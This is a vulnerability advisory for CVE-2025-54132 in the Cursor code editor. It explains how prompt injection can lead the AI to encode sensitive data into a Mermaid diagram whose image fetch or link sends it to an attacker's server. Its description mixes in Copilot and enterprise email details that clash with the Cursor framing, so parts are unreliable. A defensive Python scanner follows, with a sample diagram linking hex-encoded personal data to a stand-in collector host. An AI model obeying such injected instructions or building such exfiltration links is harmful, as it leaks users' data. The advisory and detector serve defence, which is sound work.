PT-2025-31700 · Mermaid+1

Wunderwuzzi23 · Published 2025-08-01 · Updated 2025-10-23 · CVE-2025-54132

CVSS v3.1: 7.5 (High)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Name of the Vulnerable Software and Affected Versions: Cursor versions prior to 1.3

Description: Cursor is a code editor built for programming with AI. In versions below 1.3, Mermaid, a tool used for rendering diagrams, allows embedding images. An attacker can leverage this functionality to exfiltrate sensitive information to an attacker-controlled server through an image fetch following a successful prompt injection. A malicious model or backdoor could also trigger this exploit. The issue requires prompt injection from malicious data sources such as web content, image uploads, or source code, and can result in sensitive information being sent to an attacker-controlled external server.

The vulnerability involves a combination of factors: Copilot can call tools such as enterprise email search within a tenant context and include the results in generated output, and Mermaid artifacts support clickable links, which together create an unexpected exfiltration channel. The exploitation chain is: hidden instructions embedded in a document direct data collection; Copilot gathers tenant data through its available tools; the data is encoded and inserted into a Mermaid diagram; the diagram renders as an interactive object with links; and when the link is clicked, the client or browser makes a request to a command and control server, allowing the attacker to collect the data.

Recommendations: Versions prior to 1.3 should be updated to version 1.3. As a temporary workaround, consider disabling the Mermaid functionality until a patch is available. Restrict access to sensitive data sources used by Copilot. Block or filter external calls from the Mermaid renderer to prevent fetch, image, and iframe requests. Implement detection in eDiscovery or archived exports to identify Mermaid diagrams containing long hexadecimal strings and clickable links. Avoid clicking unexpected interactive elements in reports or dialogues generated by Copilot.
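A defender-side check matching the eDiscovery recommendation above, written as an added example and not code from the advisory, Cursor or Mermaid: it scans fenced Mermaid blocks in a markdown export for click directives and image embeds that point at non-trusted hosts, and raises severity when a long hexadecimal run is also present. TRUSTED_HOSTS, the regular expressions and the sample export are assumptions made for illustration.

```python
import re
from urllib.parse import urlparse

# Added detection heuristic (not code from the advisory, Cursor or Mermaid): flag Mermaid
# diagrams in exported reports that carry clickable links or image embeds pointing at
# external hosts, and raise severity when a long hexadecimal run (encoded data) is present.
FENCE = "`" * 3  # built dynamically so the sample export can sit inside this listing

# Assumption: hosts the organisation treats as its own; everything else counts as external.
TRUSTED_HOSTS = {"intranet.example.invalid"}

# Mermaid `click <node> "<url>"` directives, HTML <img src=...> labels and markdown images.
CLICK_RE = re.compile(r'^\s*click\s+\S+\s+"(?P<url>https?://[^"]+)"', re.M)
IMG_RE = re.compile(r'<img[^>]+src=["\'](?P<url>https?://[^"\']+)'
                    r'|!\[[^\]]*\]\((?P<url2>https?://[^)]+)\)', re.I)
HEX_RE = re.compile(r'\b[0-9a-fA-F]{32,}\b')           # 16+ bytes of hex-encoded data
BLOCK_RE = re.compile(FENCE + r'mermaid[^\n]*\n(.*?)\n\s*' + FENCE, re.S)

def scan_diagram(diagram: str) -> dict:
    """Return findings for the body of one Mermaid diagram."""
    urls = [m.group("url") for m in CLICK_RE.finditer(diagram)]
    urls += [m.group("url") or m.group("url2") for m in IMG_RE.finditer(diagram)]
    external = sorted({u for u in urls if (urlparse(u).hostname or "") not in TRUSTED_HOSTS})
    hex_runs = len(HEX_RE.findall(diagram))
    suspicious = bool(external)                  # any external link/image is worth review
    return {"external_urls": external, "hex_runs": hex_runs,
            "suspicious": suspicious, "high": suspicious and hex_runs > 0}

def scan_export(markdown: str) -> list:
    """Scan every fenced mermaid block in a markdown export (eDiscovery/archive dump)."""
    return [scan_diagram(body) for body in BLOCK_RE.findall(markdown)]

# Constructed sample export: one diagram with an external link carrying hex data, one benign.
SAMPLE_EXPORT = f"""# Weekly summary

{FENCE}mermaid
flowchart LR
    A[Report] --> B[Details]
    click B "https://collector.example.invalid/c?d=4a6f686e20446f65206d61696c3a20636f6e666964656e74" "open"
{FENCE}

{FENCE}mermaid
flowchart TD
    X[Start] --> Y[End]
    click Y "https://intranet.example.invalid/wiki" "docs"
{FENCE}
"""
```

Running `scan_export(SAMPLE_EXPORT)` reports the first diagram as suspicious and high (external link plus a 48-character hex run) and the second as clean because its only link targets a trusted host.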

Exploit

Fix

SSRF

Weakness Enumeration

Related Identifiers

CVE-2025-54132
GHSA-43WJ-MWCC-X93P

Affected Products

Cursor
Mermaid